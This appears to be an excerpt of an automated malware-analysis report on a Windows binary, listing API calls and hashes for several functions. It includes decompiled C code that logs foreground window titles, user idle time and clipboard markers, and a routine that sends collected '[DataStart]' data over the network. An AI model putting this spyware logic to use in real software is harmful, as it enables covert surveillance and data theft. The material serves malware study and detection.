                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                  • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                  • API String ID: 1999370131-1609423294
                                  • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                  • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                  • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004055E7, Relevance: 54.2, APIs: 36, Instructions: 168sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNEL32(00002710), ref: 00405607
                                    • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                    • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                    • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                    • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                    • Part of subcall function 00405532: FindCloseChangeNotification.KERNEL32(00000000), ref: 004055AE
                                    • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@ChangeCloseD@2@@0@DirectoryExistsFindNotificationPathSizeV?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 131886942-0
                                  • Opcode ID: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                  • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                  • Opcode Fuzzy Hash: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                  • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004059BE, Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 158sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E004059BE(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				struct HWND__* _t42;
				int _t43;
				CHAR* _t45;
				signed int _t48;
				char* _t58;
				char* _t59;
				struct HWND__* _t93;
				intOrPtr _t94;
				void* _t99;
				intOrPtr _t112;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x41b990 & 0x00000001) == 0) {
						 *0x41b990 =  *0x41b990 | 0x00000001;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
						E00413E72(E00405BB5);
					}
					Sleep(0x1f4); // executed
					_t42 = GetForegroundWindow(); // executed
					_t93 = _t42;
					_t43 = GetWindowTextLengthA(_t93);
					_t95 = _t43;
					_t9 = _t95 + 1; // 0x1
					_t45 = _t9;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
					if(_t43 != 0) {
						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						GetWindowTextA(_t93, _t45, _t45);
						_t58 =  &_v44;
						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
						if(_t58 == 0) {
							_t59 =  &_v44;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
							_t112 =  *0x41b93e; // 0x0
							if(_t112 == 0) {
								_t103 = _t99 - 0x10;
								L00414176();
								L00414170();
								_t99 = _t99 - 0x10 + 0x18;
								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
							} else {
								_t99 = _t99 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
								E00405DD3(_v12,  &_v44);
							}
						}
					}
					_t94 = _v12;
					_t71 = _t94; // executed
					E00406C35(_t94); // executed
					if(E0041269B(_t94) < 0xea60) {
						L16:
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						continue;
					} else {
						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
							_t48 = E0041269B(_t71);
							if(_t48 < 0xea60) {
								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
								_t101 = _t99 + 0xc - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
								L00414176();
								L00414170();
								_t99 = _t99 + 0xc - 0x10 + 0x18;
								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								goto L16;
							}
							_v16 = _t48;
							Sleep(0x3e8);
						}
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						break;
					}
				}
				return 0;
			}
























                                  0x004059c7
                                  0x004059cc
                                  0x004059cc
                                  0x004059d2
                                  0x00000000
                                  0x00000000
                                  0x004059e4
                                  0x004059e6
                                  0x004059f6
                                  0x00405a01
                                  0x00405a06
                                  0x00405a0c
                                  0x00405a12
                                  0x00405a18
                                  0x00405a1b
                                  0x00405a21
                                  0x00405a28
                                  0x00405a28
                                  0x00405a2f
                                  0x00405a37
                                  0x00405a40
                                  0x00405a4a
                                  0x00405a52
                                  0x00405a58
                                  0x00405a61
                                  0x00405a6b
                                  0x00405a6d
                                  0x00405a76
                                  0x00405a7f
                                  0x00405a8a
                                  0x00405a90
                                  0x00405a96
                                  0x00405ab5
                                  0x00405ac9
                                  0x00405ad3
                                  0x00405adb
                                  0x00405ade
                                  0x00405ae6
                                  0x00405a98
                                  0x00405a98
                                  0x00405aa1
                                  0x00405aaa
                                  0x00405aaa
                                  0x00405a96
                                  0x00405a6b
                                  0x00405aec
                                  0x00405aef
                                  0x00405af1
                                  0x00405b02
                                  0x00405b97
                                  0x00405b9a
                                  0x00000000
                                  0x00405b08
                                  0x00405b08
                                  0x00405b16
                                  0x00405b1d
                                  0x00405b3d
                                  0x00405b4d
                                  0x00405b5c
                                  0x00405b6c
                                  0x00405b76
                                  0x00405b7b
                                  0x00405b80
                                  0x00405b88
                                  0x00405b91
                                  0x00000000
                                  0x00405b91
                                  0x00405b24
                                  0x00405b27
                                  0x00405b27
                                  0x00405ba8
                                  0x00000000
                                  0x00405ba8
                                  0x00405b02
                                  0x00405bb4

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                  • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                  • GetForegroundWindow.USER32 ref: 00405A12
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                  • GetWindowTextA.USER32 ref: 00405A52
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                  • _itoa.MSVCRT ref: 00405B3D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                  • String ID: [ ${ User has been idle for $ ]$ minutes }
                                  • API String ID: 615312007-3343415809
                                  • Opcode ID: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                  • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                  • Opcode Fuzzy Hash: 0e15a73bea33ccb5e514cff3bf8d1caab7dc6e5c798de36ef3d90741790d0d5c
                                  • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040221E, Relevance: 43.7, APIs: 29, Instructions: 151synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 00402291
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402363
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040236D
                                  • CreateThread.KERNEL32(00000000,00000000,?,0041BE70,00000000,00000000), ref: 0040237E
                                  • WaitForSingleObject.KERNEL32(00000408,000000FF), ref: 00402389
                                  • CloseHandle.KERNEL32(00000408), ref: 00402392
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,6B015DF0), ref: 004023A7
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3745950881-0
                                  • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                  • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                  • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402440, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 72networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                  • send.WS2_32(?,00000000), ref: 004024BB
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                  • send.WS2_32(?,00000000), ref: 004024FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
